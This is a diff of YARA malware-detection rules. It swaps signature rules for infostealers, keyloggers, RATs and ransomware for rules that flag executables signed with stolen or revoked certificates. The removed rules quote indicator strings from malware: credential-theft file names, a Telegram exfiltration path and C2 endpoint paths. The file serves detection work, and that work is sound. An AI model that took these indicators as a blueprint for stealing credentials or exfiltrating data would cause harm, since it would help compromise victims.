+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L871-L903"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5165-L5176"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eaf50d824dbade0ca63fafc5b4a376553039de9b51a0f6387cb28c8f91a7e0b9"
+		logic_hash = "5963377fee755a859bc4330a1094ea1c8b2b588133706a22f67c1fb85542e64f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Buran"
-
-	strings:
-		$v1_1 = "U?$error_info_injector@V" ascii
-		$v1_2 = "Browse for Folder (FTP)" fullword ascii
-		$v1_3 = "Find/Replace in Files" fullword ascii
-		$v1_4 = "PAHKLM" fullword ascii
-		$v1_5 = "PAHKCR" fullword ascii
-		$v1_6 = "chkOpt_" ascii
-		$h1 = "Search <a href=\"location\" class=\"menu\">in this folder</a>" ascii
-		$h2 = "<br>to find where the text below" ascii
-		$h3 = "</a> files with these extensions (separate with semi-colons)" ascii
-		$h4 = "Need help with <a href=\"" ascii
-		$path = "\\work\\cr\\nata\\libs\\boost_" wide
-		$v2_1 = "(ShlObj" fullword ascii
-		$v2_2 = "\\StreamUnit" fullword ascii
-		$v2_3 = "TReadme" fullword ascii
-		$v2_4 = "TDrivesAndShares" fullword ascii
-		$v2_5 = "TCustomMemoryStreamD" fullword ascii
-		$v2_6 = "OpenProcessToken" fullword ascii
-		$v2_7 = "UrlMon" fullword ascii
-		$v2_8 = "HttpSendRequestA" fullword ascii
-		$v2_9 = "InternetConnectA" fullword ascii
-		$v2_10 = "FindFiles" fullword ascii
-		$v2_12 = "$*@@@*$@@@$" ascii
+		thumbprint = "e35804bbf4573f492c51a7ad7a14557816fe961f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( ( all of ( $v1* ) and 1 of ( $h* ) ) or ( $path and 2 of ( $v1* ) and 1 of ( $h* ) ) or 10 of them ) or all of ( $v2* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orca System" and pe.signatures [ i ] . serial == "02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" )
 }
-rule DITEKSHEN_MALWARE_Win_Masslogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_142Aac4217E22B525C8587589773Ba9B : FILE
 {
 	meta:
-		description = "MassLogger keylogger payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9181b89a-2ce8-59b6-9703-c01a8471b8d6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "86ef1337-71cc-5231-a31c-8d8a8d95873f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L905-L934"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5178-L5188"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d8bbefa71a1eb20cd9d029bd516d6c37e39cfa053ed0617eace200d210d9b58"
+		logic_hash = "a0abe691c6b0a7be8ceea313068a6943d611b1424a1a03e43b82239ddfe9cbd2"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "MassLogger v" ascii wide
-		$s2 = "MassLogger Started:" ascii wide
-		$s3 = "MassLogger Process:" ascii wide
-		$s4 = "/panel/upload.php" wide
-		$s5 = "ftp://" wide
-		$s6 = "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" fullword wide
-		$s7 = "^(.*/)?([^/\\\\.]+/\\\\.\\\\./)(.+)$" fullword wide
-		$s8 = "Bot Killer" ascii
-		$s9 = "Keylogger And Clipboard" ascii
-		$c1 = "costura.ionic.zip.reduced.dll.compressed" fullword ascii
-		$c2 = "CHECKvUNIQUEq" fullword ascii
-		$c3 = "HOOK/MEMORY6" fullword ascii
-		$c4 = "Massfile" ascii wide
-		$c5 = "Fz=[0-9]*'skips*" fullword ascii
-		$c6 = ":=65535zO" fullword ascii
-		$c7 = "!$!%!&!'!(!)!*!.!/!0!4!" fullword ascii
-		$c8 = "5!9!:!<!>!@!E!G!J!K!L!N!O!P!`!" fullword ascii
-		$c9 = "dllToLoad" fullword ascii
-		$c10 = "set_CreateNoWindow" fullword ascii
-		$c11 = "FtpWebRequest" fullword ascii
-		$c12 = "encryptedUsername" fullword ascii
-		$c13 = "encryptedPassword" fullword ascii
+		thumbprint = "b15a4189dcbb27f9b7ced94bc5ca40b7e62135c3"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 9 of ( $c* ) ) or ( 5 of ( $s* ) or 9 of ( $c* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" )
 }
-rule DITEKSHEN_MALWARE_Win_Echelon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4026D6291F1Ac7Cf86C2C81172Cfb200 : FILE
 {
 	meta:
-		description = "Echelon information stealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e13d2003-c755-5dd3-bb16-8e41dd19a151"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "ea11705d-37a1-5050-b01a-b7fc523c675a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L936-L957"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5218-L5229"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c070bf52cc51dd334ea24614e33eaa2b7b1a17e7790e586cbbb8c7e33ba1bd76"
+		logic_hash = "c821f288bb6555e3955dfccf02edde2448f0499942eea24c488a6426985bff74"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "<GetStealer>b__" ascii
-		$s2 = "clearMac" fullword ascii
-		$s3 = "path2save" fullword ascii
-		$s4 = "Echelon_Size" fullword ascii
-		$s5 = "Echelon Stealer by" wide
-		$s6 = "get__masterPassword" fullword ascii
-		$s7 = "DomainDetect" fullword ascii
-		$s8 = "[^\\u0020-\\u007F]" fullword wide
-		$s9 = "/sendDocument?chat_id=" wide
-		$s10 = "//setting[@name='Password']/value" wide
-		$s11 = "Passwords_Mozilla.txt" fullword wide
-		$s12 = "Passwords_Edge.txt" fullword wide
-		$s13 = "@madcod" ascii wide
-		$pdb = "\\Echelon-Stealer-master\\obj\\Release\\Echelon.pdb" ascii
+		thumbprint = "2ae4328db08bac015d8965e325b0263c0809d93e"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or $pdb ) ) or ( 8 of ( $s* ) or $pdb )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MztxUCVYqnxgsyqVryViRnMfHFYBgyVMXkXuVGqmyPx" and pe.signatures [ i ] . serial == "40:26:d6:29:1f:1a:c7:cf:86:c2:c8:11:72:cf:b2:00" )
 }
-rule DITEKSHEN_MALWARE_Win_Qulab
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B0A308Fc2E71Ac4Ac40677B9C27Ccbad : FILE
 {
 	meta:
-		description = "Qulab information stealer payload or artifacts"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6ae24c67-5700-5330-a3bd-d542162faebb"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "207aa920-528c-5fa2-a8d4-4a44da4c870e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L959-L983"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5231-L5242"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "659d828cbef38c6362b612be9bdc05ae820f49c23684e77af6462ea677133284"
+		logic_hash = "a71c47475327fb6268db34cd9d47451090fa3e673accfa905d32ebfb35f11e40"
 		score = 75
 		quality = 75
-		tags = ""
-		clamav_sig = "MALWARE.Win.Trojan.QulabZ-Stealer"
-
-	strings:
-		$x1 = "QULAB CLIPPER + STEALER" ascii wide
-		$x2 = "MASAD CLIPPER + STEALER" ascii wide
-		$x3 = "http://teleg.run/Qulab" ascii wide
-		$x4 = "http://teleg.run/jew_seller" ascii wide
-		$x5 = "BUY CLIPPER + STEALER" ascii wide
-		$s1 = "\\Screen.jpg" ascii wide
-		$s2 = "attrib +s +h \"" ascii wide
-		$s3 = "\\x86_microsoft-windows-" ascii wide
-		$s4 = "\\amd64_microsoft-windows-" ascii wide
-		$s5 = "Desktop TXT File" ascii wide
-		$s6 = "\\AutoFills.txt" ascii wide
-		$s7 = "\\CreditCards.txt" ascii wide
-		$s8 = "a -y -mx9 -ssw" ascii wide
-		$s9 = "\\Passwords.txt" ascii wide
-		$s10 = "\\Information.txt" ascii wide
-		$s11 = "\\getMe" ascii wide
+		tags = "FILE"
+		thumbprint = "15e502f1482a280f7285168bb5e227ffde4e41a6"
+		importance = 20
 
 	condition:
-		9 of them or ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or 1 of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Volpayk LLC" and pe.signatures [ i ] . serial == "00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" )
 }
-rule DITEKSHEN_MALWARE_Win_Orion : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_009Ecaa6E28E7615Ef5A12D87E327264C0 : FILE
 {
 	meta:
-		description = "Orion Keylogger payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b380b93b-6ceb-5244-aeca-b1f8f9a5b553"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8fd9f4e8-4ec3-5731-8032-e2657ee229ca"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L985-L1005"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5244-L5255"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9e5521ebaf9bdef6dadd2a2a093bd6f87ded023d9a74db126ac8ec9a5f1f9744"
+		logic_hash = "24858027f62fd057c06dbf58b4a6e1e5f1dcd9429676232a8e66d231e713f56a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\Ranger.BrowserLogging" ascii wide nocase
-		$s2 = "GrabAccounts" fullword ascii
-		$s3 = "DownloadFile" fullword ascii
-		$s4 = "Internet Explorer Recovery" wide
-		$s5 = "Outlook Recovery" wide
-		$s6 = "Thunderbird Recovery" wide
-		$s7 = "Keylogs -" wide
-		$s8 = "WebCam_Capture.dll" wide
-		$s9 = " is not installed on this computer!" wide
-		$s10 = "cmd /c bfsvc.exe \"" wide
-		$s11 = "/Keylogs - PC:" fullword wide
-		$s12 = "/PC:" fullword wide
-		$s13 = "<p style=\"color:#CC7A00\">[" wide
+		thumbprint = "50899ef5014af31cd54cb9a7c88659a6890b6954"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 5 of ( $s* ) ) or ( 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HaqMkgGQmnNHpFsQmzMRDcavkPBzOcvMatDmcLHuDNoiQWMqj" and pe.signatures [ i ] . serial == "00:9e:ca:a6:e2:8e:76:15:ef:5a:12:d8:7e:32:72:64:c0" )
 }
-rule DITEKSHEN_MALWARE_Win_Aspire : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_19985190B09206952Efd412D3Ccc18E2 : FILE
 {
 	meta:
-		description = "Aspire Keylogger payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "25724975-f373-553e-b27e-43168e956c16"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "bd94cfd0-adaa-5e37-880e-8ef50328499d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1007-L1022"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5257-L5268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ea0136dbacb79e4c7556f562d17b26b84ac3e4c967b117021e2399ded0a0fdf"
+		logic_hash = "6db1aaabd9a257e863a5ff771a736b705391602f7f5e2b799f8c47d3ae566f0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "AspireLogger -" wide
-		$s2 = "Application: @" wide
-		$s3 = "encryptedUsername" wide
-		$s4 = "encryptedPassword" wide
-		$s5 = "Fetch users fron logins" wide
-		$s6 = "URI=file:" wide
-		$s7 = "signons.sqlite" wide
-		$s8 = "logins.json" wide
+		thumbprint = "49ec0580239c07da4ffba56dc8617a8c94119c69"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( 7 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "cwcpbvBhYEPeJYcCNDldHTnGK" and pe.signatures [ i ] . serial == "19:98:51:90:b0:92:06:95:2e:fd:41:2d:3c:cc:18:e2" )
 }
-rule DITEKSHEN_MALWARE_Win_S05Kitty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_03B27D7F4Ee21A462A064A17Eef70D6C : FILE
 {
 	meta:
-		description = "Sector05 Kitty RAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3261f6b6-21e7-5195-98db-9607ba530572"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "96920ba8-b6d6-5cf4-9a3c-cb6f5c9b3048"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1024-L1045"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5270-L5281"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "df2930694671c9ca16f2afeb799704647c9acf32be118706c342347ffe8ceb36"
+		logic_hash = "53a4c4474b1add510624e23eac642e8cba145248d72a2ffc37d0aca141a041c2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Execute Comand" ascii
-		$s2 = "InjectExplorer" ascii
-		$s3 = "targetProcess = %s" fullword ascii
-		$s4 = "Process attach (%s)" fullword ascii
-		$s5 = "process name: %s" fullword ascii
-		$s6 = "cmd /c %s >%s" fullword ascii
-		$s7 = "CmdDown: %s, failed" fullword ascii
-		$s8 = "http://%s%s/%s" fullword ascii
-		$s9 = "tmp.LOG" fullword ascii
-		$x1 = "zerodll.dll" fullword ascii
-		$x2 = "OneDll.dll" fullword ascii
-		$x3 = "kkd.bat" fullword ascii
-		$x4 = "%s\\regsvr32.exe /s \"%s\"" fullword ascii
-		$x5 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fontchk.jse" fullword ascii
+		thumbprint = "a278b5c8a9798ee3b3299ec92a4ab618016628ee"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or all of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CCL TRADING LIMITED" and pe.signatures [ i ] . serial == "03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" )
 }
-rule DITEKSHEN_MALWARE_Win_Fakewmi : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_66F98881Fbb02D0352Bef7C13Bd61Df2 : FILE
 {
 	meta:
-		description = "FakeWMI payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "689bc207-2bc6-50de-80d6-d1ba0a26b264"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "9cc569f4-1686-5f17-99a4-90750023d519"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1047-L1064"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5283-L5294"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "627886cdd01f5f02e454ef284c77c87eb027ee33f6a51536758fb7f095271a40"
+		hash = "f265524fb9a4a58274dbd32b2ed0c3f816c5eff05e1007a2e7bba286b8ffa72c"
+		logic_hash = "3d70da3f644a90bc6e7b405a41225a328d7007187525a0b277f0fc1136be8b5b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Fakewmi"
-
-	strings:
-		$s1 = "-BEGIN RSA PUBLIC KEY-" ascii
-		$s2 = ".exe|" ascii
-		$s3 = "cmd /c wmic " ascii
-		$s4 = "cmd /c sc " ascii
-		$s5 = "schtasks" ascii
-		$s6 = "taskkill" ascii
-		$s7 = "findstr" ascii
-		$s8 = "netsh interface" ascii
-		$s9 = "CreateService" ascii
+		thumbprint = "722eee34153fc67ea7abdcb0c6e9e54479f1580e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and #s2 > 10 )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "66:f9:88:81:fb:b0:2d:03:52:be:f7:c1:3b:d6:1d:f2" )
 }
-rule DITEKSHEN_MALWARE_Win_Baldr : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3F8B1D4C656982A34435F971C9F3C301 : FILE
 {
 	meta:
-		description = "Baldr payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cdc35a11-a97b-5e21-929e-01fed5172b55"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "7bafe9c8-7ec5-5847-81dc-2f2d0753f784"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1066-L1083"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5296-L5307"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f8e97fd618209bc6ce609b60b1e1f1e359be7678474fad3b18a529487c64cd99"
+		logic_hash = "95fd60c5f236b06fca308696dfe3e3aeb3aa6f255c6030d44822dc33a7c4c917"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Baldr"
-
-	strings:
-		$x1 = "BALDR VERSION : {0}" fullword wide
-		$x2 = "Baldr" fullword ascii wide
-		$x3 = "{0}\\{1:n}.exe" fullword wide
-		$x4 = ".doc;.docx;.log;.txt;" fullword wide
-		$s1 = "<GetMAC>b__" ascii
-		$s2 = "<ExtractPrivateKey3>b__" ascii
-		$s3 = "UploadData" fullword ascii
-		$s6 = "get_NetworkInterfaceType" fullword ascii
-		$s5 = "get_Passwordcheck" fullword ascii
+		thumbprint = "f12a12ac95e5c4fa9948dd743cc0e81e46c5222e"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of ( $x* ) ) or ( 2 of ( $x* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Word" and pe.signatures [ i ] . serial == "3f:8b:1d:4c:65:69:82:a3:44:35:f9:71:c9:f3:c3:01" )
 }
-rule DITEKSHEN_MALWARE_Win_Megumin : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ef9D0Cf071D463Cd63D13083046A7B8D : FILE
 {
 	meta:
-		description = "Megumin payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bb1743f7-0bd8-5c0a-ad78-c4747904204f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "f4b83bdf-ce07-5bad-b3e2-2c192d67f9f1"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1085-L1108"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5309-L5320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fb4934814c45d2465b6e1589c3b489116343ca0c17ebb916b5c9247fc676c74d"
+		logic_hash = "9cf4ee1b3000d96d419bfd3e9ac3fb07f843aed735582c72e3a9799e2a56e364"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Megumin"
-
-	strings:
-		$s1 = "loadpe|" fullword ascii
-		$s2 = "Megumin/2.0" fullword ascii
-		$s3 = "/c start /I \"\" \"" fullword ascii
-		$s4 = "jsbypass|" fullword ascii
-		$cnc1 = "Mozilla/5.0 (Windows NT 6.1) Megumin/2.0" fullword ascii
-		$cnc2 = "/cdn-cgi/l/chk_jschl?s=" fullword ascii
-		$cnc3 = "/newclip?hwid=" fullword ascii
-		$cnc4 = "/isClipper" fullword ascii
-		$cnc5 = "/task?hwid=" fullword ascii
-		$cnc6 = "/completed?hwid=" fullword ascii
-		$cnc7 = "/gate?hwid=" fullword ascii
-		$cnc8 = "/addbot?hwid=" fullword ascii
-		$pdb = "\\MeguminV2\\Release\\MeguminV2.pdb" ascii
+		thumbprint = "346849dfdeb9bb1a97d98c62d70c578dacbcf30c"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $cnc* ) or $pdb ) ) or 11 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rubin LLC" and pe.signatures [ i ] . serial == "00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" )
 }
-rule DITEKSHEN_MALWARE_Win_Rietspoof : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E1E7E596F8F5Ccbeed4Ab882B6Cfe6Ce : FILE
 {
 	meta:
-		description = "Rietspoof payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b2d94705-ca59-56ae-8471-2c6895d355dc"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "063d70e1-06b0-53f6-8edb-c81c89af0a05"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1110-L1140"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5322-L5333"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d1d9baab83c904d1e8dcd7aeacdabfc79c1acee67006793c2240a42ebf9c62b2"
+		logic_hash = "56977d47d8fcfd5eb7b5b4a141a9465e1cd2c497f05e61854e0ab09e2c7065a0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Rietspoof"
-
-	strings:
-		$c1 = "%s%s%s USER: user" fullword ascii
-		$c2 = "cmd /c %s" fullword ascii
-		$c3 = "CreateObject(\"Scripting.FileSystemObject\").DeleteFile(" ascii
-		$c4 = "WScript.Quit" fullword ascii
-		$c5 = "CPU: %s(%d)" fullword ascii
-		$c6 = "RAM: %lld Mb" fullword ascii
-		$c7 = "data.dat" fullword ascii
-		$c8 = "%s%s%s USER:" ascii
-		$v1_1 = ".vbs" ascii
-		$v1_2 = "HELLO" ascii
-		$v1_3 = "Wscript.Sleep" ascii
-		$v1_4 = "User-agent:Mozilla/5.0 (Windows; U;" ascii
-		$v2_1 = "Xjoepxt!" ascii
-		$v2_2 = "Content-MD5:%s" fullword ascii
-		$v2_3 = "M9h5an8f8zTjnyTwQVh6hYBdYsMqHiAz" fullword ascii
-		$v2_4 = "GET /%s?%s HTTP/1.1" fullword ascii
-		$v2_5 = "GET /?%s HTTP/1.1" fullword ascii
-		$pdb1 = "\\techloader\\loader\\loader.odb" ascii wide
-		$pdb2 = "\\loader\\Release\\loader_v1.0.pdb" ascii wide
+		thumbprint = "4fec400152db868b07f202fd76366332aedc7b78"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $c* ) and ( 3 of ( $v* ) or 1 of ( $pdb* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LnvNzpvYjsjJOwcvwfalIvRAJHVApnpJU" and pe.signatures [ i ] . serial == "00:e1:e7:e5:96:f8:f5:cc:be:ed:4a:b8:82:b6:cf:e6:ce" )
 }
-rule DITEKSHEN_MALWARE_Win_Modirat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_047801D5B55C800B48411Fd8C320Ca5B : FILE
 {
 	meta:
-		description = "MoDiRAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8b641c7a-5ebd-50e7-83cb-e408683c456b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "750b5b0d-7752-5407-a29e-3272b764a276"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1142-L1158"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5335-L5346"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d0760e9dab7e9c0affb2193ea249feea8bb58e519522ca2a562f015059ad5590"
+		logic_hash = "5e64b59f3d7f7554a482eaa32f5eac80f289bf57865a21381a3c1c78b1dabcab"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "add_Connected" fullword ascii
-		$s2 = "Statconnected" fullword ascii
-		$s3 = "StartConnect" fullword ascii
-		$s4 = "TelegramTitleDetect" fullword ascii
-		$s5 = "StartTitleTelegram" fullword ascii
-		$s6 = "Check_titles" fullword ascii
-		$s7 = "\\MoDi RAT V" ascii
-		$s8 = "IsBuzy" fullword ascii
-		$s9 = "Recording_Time" fullword wide
+		thumbprint = "00c49b8d6fd7d2aa26faad8e5a31f93a15d66d09"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 7 of them ) or all of them
